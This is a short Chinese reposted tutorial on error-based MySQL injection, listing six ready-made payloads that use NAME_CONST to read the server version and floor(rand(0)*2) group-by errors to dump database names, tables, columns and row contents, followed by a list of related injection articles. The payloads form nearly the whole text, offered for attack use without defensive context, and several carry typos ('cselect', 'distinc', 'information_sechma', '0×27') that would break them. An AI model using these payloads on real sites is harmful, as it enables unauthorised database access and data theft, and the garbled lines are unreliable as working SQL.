MYSQL高版本报错注入技巧-利用NAME_CONST注入
2014-01-16 09:29
1121 查看
MYSQL高版本报错注入技巧-利用NAME_CONST注入
来源:本站转载 作者:佚名 时间:2012-03-13 TAG:and (select count(*) from mysql.user)>0/*
http://www.myhack58.com/Article/html/3/7/2012/33330.htm
1、查看MYSQL版本
and+exists(select*from+(select*from(select+name_const(@@version,0))a+join(select+name_const(@@version,0))b)c)
2、爆所有库
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0×27,schema_name,0×27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x
from information_schema.tables group by x)a) and 1=1
3、爆当前数据库
and(select 1 from(select count(*),concat((select cselect concat(0x7e,0×27,hex(cast(database() as char)),0×27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
and 1=1
4、爆表
and(select 1 from(select count(*),concat((select (select (select distinc concat(0x7e,0×27,hex(cast(table_name as char)),0×27,0x7e) from information_schema.tables where table_schema=hex库名limit 1,1)) from information_schema.tables
limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
5、爆字段
and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0×27,column_name,0×27,0x7e) from information_sechma.columns where table_schema=库名and table_name=表名limit 0,1)) from information_schema.tables
limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
6、爆内容
and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0×27,表名.字段,0×27,0x7e) from 表名limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
and 1=1
相关文章推荐
- MYSQL高版本报错注入技巧-利用NAME_CONST注入
- 【mysql注入】mysql注入点的技巧整合利用
- mysql注入利用到的变量总结
- mysql注入绕过的一些技巧
- 安全测试===Mysql 注入技巧学习 MySQL注入技巧(1)
- 您的项目引用了最新实体框架;但是,找不到数据链接所需的与版本兼容的实体框架数据库 EF6使用Mysql的技巧
- MySQL注入技巧性研究
- 您的项目引用了最新实体框架;但是,找不到数据链接所需的与版本兼容的实体框架数据库 EF6使用Mysql的技巧
- MySQL学习之——利用MySQL判断操作系统版本
- 利用服务器的几个调优技巧,让 MySQL 服务器飞速运行
- 利用tcpdump对mysql进行抓包操作技巧
- 详解MySQL注入利用的变量
- MySQL注入技巧
- 利用rpm安装mysql 5.6版本详解
- mysql 延时注入,利用二进制延迟注入~!
- mysql注入中三种报错模式利用方法详解
- 利用tcpdump对mysql进行抓包操作技巧
- 通用的关于sql注入的绕过技巧(利用mysql的特性)
- MySQL注入中报错的利用
- C语言系列(三):最近重拾C语言的想法,谈到C中易错点,难点;以及开源代码中C语言的一些常用技巧,以及如何利用define、typedef、const等写健壮的C程序